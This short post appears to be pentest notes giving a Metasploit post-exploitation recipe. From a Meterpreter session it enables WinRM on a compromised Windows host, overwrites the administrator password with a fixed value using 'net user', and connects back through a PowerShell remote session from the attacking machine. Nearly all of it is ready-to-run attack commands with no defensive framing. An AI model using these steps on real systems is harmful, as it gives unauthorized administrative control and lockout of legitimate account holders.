Enable WinRM with metasploit
- Post
WinRM use default ports : 5985 et 5986
- Exploit the target
- Open meterpreter session
- Load meterpreter Powershell
load powershell
- Enable WinRM
powershell_execute Enable-PSRemoting -Force
- Change administrator password
powershell_execute 'net user administrator Passw0rd1_123'
- From the attacking machine use Linux powershell to connect to the target via PSSession
pwsh $credentials = Get-Credential # administrator # Passw0rd1_123 Enter-PSSession -ComputerName x.x.x.x -Authentication Negotiate -Credential $credentials